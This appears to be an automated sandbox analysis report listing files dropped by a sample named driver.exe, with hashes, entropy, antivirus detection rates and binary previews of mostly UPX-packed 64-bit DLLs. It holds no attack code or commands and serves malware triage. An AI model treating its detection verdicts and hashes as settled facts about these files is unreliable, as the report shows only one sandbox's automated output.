                                                                                                                                                                                                                                              Preview:L...+..g.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........U....c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP....................-..s.F..\.,Zu..........5.......C:\Users\user\AppData\Local\Temp\RESF5CD.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....(.....L.e.
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):120400
                                                                                                                                                                                                                                              Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                              MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                              SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                              SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                              SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):51192
                                                                                                                                                                                                                                              Entropy (8bit):7.762871670400831
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
                                                                                                                                                                                                                                              MD5:E1B31198135E45800ED416BD05F8362E
                                                                                                                                                                                                                                              SHA1:3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
                                                                                                                                                                                                                                              SHA-256:43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
                                                                                                                                                                                                                                              SHA-512:6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65016
                                                                                                                                                                                                                                              Entropy (8bit):7.844438023002735
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
                                                                                                                                                                                                                                              MD5:B6262F9FBDCA0FE77E96A9EED25E312F
                                                                                                                                                                                                                                              SHA1:6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
                                                                                                                                                                                                                                              SHA-256:1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
                                                                                                                                                                                                                                              SHA-512:768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.|.4.|.4.|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):122088
                                                                                                                                                                                                                                              Entropy (8bit):7.904008472378221
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
                                                                                                                                                                                                                                              MD5:9CFB6D9624033002BC19435BAE7FF838
                                                                                                                                                                                                                                              SHA1:D5EECC3778DE943873B33C83432323E2B7C2E5C2
                                                                                                                                                                                                                                              SHA-256:41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
                                                                                                                                                                                                                                              SHA-512:DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):37368
                                                                                                                                                                                                                                              Entropy (8bit):7.62885373795624
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
                                                                                                                                                                                                                                              MD5:0B214888FAC908AD036B84E5674539E2
                                                                                                                                                                                                                                              SHA1:4079B274EC8699A216C0962AFD2B5137809E9230
                                                                                                                                                                                                                                              SHA-256:A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
                                                                                                                                                                                                                                              SHA-512:AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):89592
                                                                                                                                                                                                                                              Entropy (8bit):7.901406061659478
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
                                                                                                                                                                                                                                              MD5:ADEAA96A07B7B595675D9F351BB7A10C
                                                                                                                                                                                                                                              SHA1:484A974913276D236CB0D5DB669358E215F7FCED
                                                                                                                                                                                                                                              SHA-256:3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
                                                                                                                                                                                                                                              SHA-512:5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..|...o3..}...o3..v...o3..r....3..}....4..|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29552
                                                                                                                                                                                                                                              Entropy (8bit):7.411884404531348
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
                                                                                                                                                                                                                                              MD5:766820215F82330F67E248F21668F0B3
                                                                                                                                                                                                                                              SHA1:5016E869D7F65297F73807EBDAF5BA69B93D82BD
                                                                                                                                                                                                                                              SHA-256:EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
                                                                                                                                                                                                                                              SHA-512:4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):46584
                                                                                                                                                                                                                                              Entropy (8bit):7.708630278879131
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
                                                                                                                                                                                                                                              MD5:65CD246A4B67CC1EAB796E2572C50295
                                                                                                                                                                                                                                              SHA1:053FA69B725F1789C87D0EF30F3D8997D7E97E32
                                                                                                                                                                                                                                              SHA-256:4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
                                                                                                                                                                                                                                              SHA-512:C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..|^..}M..|_..}M..|T..}M..|Q..}..|^..}\..}...}...|U..}..|]..}..|]..}.>}]..}..|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):61432
                                                                                                                                                                                                                                              Entropy (8bit):7.832464272741381
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
                                                                                                                                                                                                                                              MD5:F018B2C125AA1ECC120F80180402B90B
                                                                                                                                                                                                                                              SHA1:CF2078A591F0F45418BAB7391C6D05275690C401
                                                                                                                                                                                                                                              SHA-256:67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
                                                                                                                                                                                                                                              SHA-512:C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):70512
                                                                                                                                                                                                                                              Entropy (8bit):7.839717554547019
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
                                                                                                                                                                                                                                              MD5:309B1A7156EBD03474B44F11BA363E89
                                                                                                                                                                                                                                              SHA1:8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
                                                                                                                                                                                                                                              SHA-256:67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
                                                                                                                                                                                                                                              SHA-512:E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22112
                                                                                                                                                                                                                                              Entropy (8bit):4.744270711412692
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
                                                                                                                                                                                                                                              MD5:E8B9D74BFD1F6D1CC1D99B24F44DA796
                                                                                                                                                                                                                                              SHA1:A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
                                                                                                                                                                                                                                              SHA-256:B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
                                                                                                                                                                                                                                              SHA-512:B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.602255667966723
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
                                                                                                                                                                                                                                              MD5:CFE0C1DFDE224EA5FED9BD5FF778A6E0
                                                                                                                                                                                                                                              SHA1:5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
                                                                                                                                                                                                                                              SHA-256:0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
                                                                                                                                                                                                                                              SHA-512:B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.606873381830854
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
                                                                                                                                                                                                                                              MD5:33BBECE432F8DA57F17BF2E396EBAA58
                                                                                                                                                                                                                                              SHA1:890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
                                                                                                                                                                                                                                              SHA-256:7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
                                                                                                                                                                                                                                              SHA-512:619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.65169290018864
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
                                                                                                                                                                                                                                              MD5:EB0978A9213E7F6FDD63B2967F02D999
                                                                                                                                                                                                                                              SHA1:9833F4134F7AC4766991C918AECE900ACFBF969F
                                                                                                                                                                                                                                              SHA-256:AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
                                                                                                                                                                                                                                              SHA-512:6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26216
                                                                                                                                                                                                                                              Entropy (8bit):4.866487428274293
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
                                                                                                                                                                                                                                              MD5:EFAD0EE0136532E8E8402770A64C71F9
                                                                                                                                                                                                                                              SHA1:CDA3774FE9781400792D8605869F4E6B08153E55
                                                                                                                                                                                                                                              SHA-256:3D2C55902385381869DB850B526261DDEB4628B83E690A32B67D2E0936B2C6ED
                                                                                                                                                                                                                                              SHA-512:69D25EDF0F4C8AC5D77CB5815DFB53EAC7F403DC8D11BFE336A545C19A19FFDE1031FA59019507D119E4570DA0D79B95351EAC697F46024B4E558A0FF6349852
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......z.....`A........................................p................@...............@..h&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.619913450163593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:iDGaWqhWhWJWadJCsVWQ4mWd9afKUSIX01k9z3AEXzAU9:i6aWqhWACs92IR9z5EU9
                                                                                                                                                                                                                                              MD5:1C58526D681EFE507DEB8F1935C75487
                                                                                                                                                                                                                                              SHA1:0E6D328FAF3563F2AAE029BC5F2272FB7A742672
                                                                                                                                                                                                                                              SHA-256:EF13DCE8F71173315DFC64AB839B033AB19A968EE15230E9D4D2C9D558EFEEE2
                                                                                                                                                                                                                                              SHA-512:8EDB9A0022F417648E2ECE9E22C96E2727976332025C3E7D8F15BCF6D7D97E680D1BF008EB28E2E0BD57787DCBB71D38B2DEB995B8EDC35FA6852AB1D593F3D1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@......;.....`A........................................p...L............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):18696
                                                                                                                                                                                                                                              Entropy (8bit):7.054510010549814
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                                                                                                                                                                              MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                                                                                                                                                                              SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
